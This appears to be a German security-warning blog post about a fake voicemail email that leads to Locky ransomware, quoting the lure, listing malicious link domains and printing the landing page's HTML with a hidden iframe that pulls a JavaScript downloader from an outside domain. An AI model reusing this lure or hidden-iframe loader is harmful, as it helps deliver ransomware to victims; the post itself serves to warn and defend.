‚Voice Message from 014077051521 – name unavailable‘ von ‚Voice Message (vmservice@Deine Domain)‘ bringt Locky Ransomware!

Wie schon am 06.09.2017, so wurde auch am Freitag, den 29. September 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail versendet. Öffnen Sie nicht den Link! Es wird ein JavaScript geladen, welches die Ransomware „Locky“ (Verschlüsselungs- und Epressungstrojaner) nachlädt und alle Ihre Dateien in *.lukitus umbenennt / verschlüsselt!

Betreff: Voice Message from 014077051521 – name unavailable
Absender: Voice Message“ (vmservice@eigene Domain)

Time:Fri, 29 Sep 2017 14:39:57 +0500
From: 014077051521 – name unavailable
Click to listen Voice Message

Achtung: Es handelt sich um eine betrügerische E-Mail! Öffnen Sie nicht den Link! Die E-Mail täuscht eine Sprachnotiz vor.

Die E-Mail kommt mit unterschiedlichen Links („Click“). Klicken Sie nicht auf die Links, da ein bösartige Datei geladen wird!

  • alucmuhendislik.com/voicemsg.html
  • shineindian.com/voicemsg.html
  • vincent-farben.de/voicemsg.html

Zum Teil sind die Adressen bereits nicht mehr verfügbar…

… oder der Browser warnt bereits vor einem Aufruf der Seite …

Wenn die bösartige Seite noch verfügbar ist, würde Sie so aussehen:

Downloading. Please wait…

Dieser Hinweis lädt das betrügerische JavaScript aber über einen iFrame von einer anderen Domain:

<div style=“background:#eee;border:1px solid #ccc;padding:5px 10px;“>Dowloading. Please wait…</div>
<iframe src=“http://moroplinghaptan.info/ offjsjs/*“ style=“display: none;“>
</iframe>

  • moroplinghaptan.info/offjsjs/*

 

Das JavaScript bekommt beim Abspeichern auf dem PC unterschiedliche Namen:

voicemsg_45.js

Der Inhalt des JavaScript macht deutlich, dass es sich nicht um eine Sprachnachricht handelt:

 

Beim Test hat das Script keine Datei geladen. Es ist aber davon auszugehen, dass die Locky Ransomware geladen werden sollte. Wie sich diese zeigt, sehen Sie in der Warnung „Voice Message from 010176348949 – name unavailable von Voice Message (vmservice@Deine Domain) bringt Locky Ransomware“ vom 06.09.2017.

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert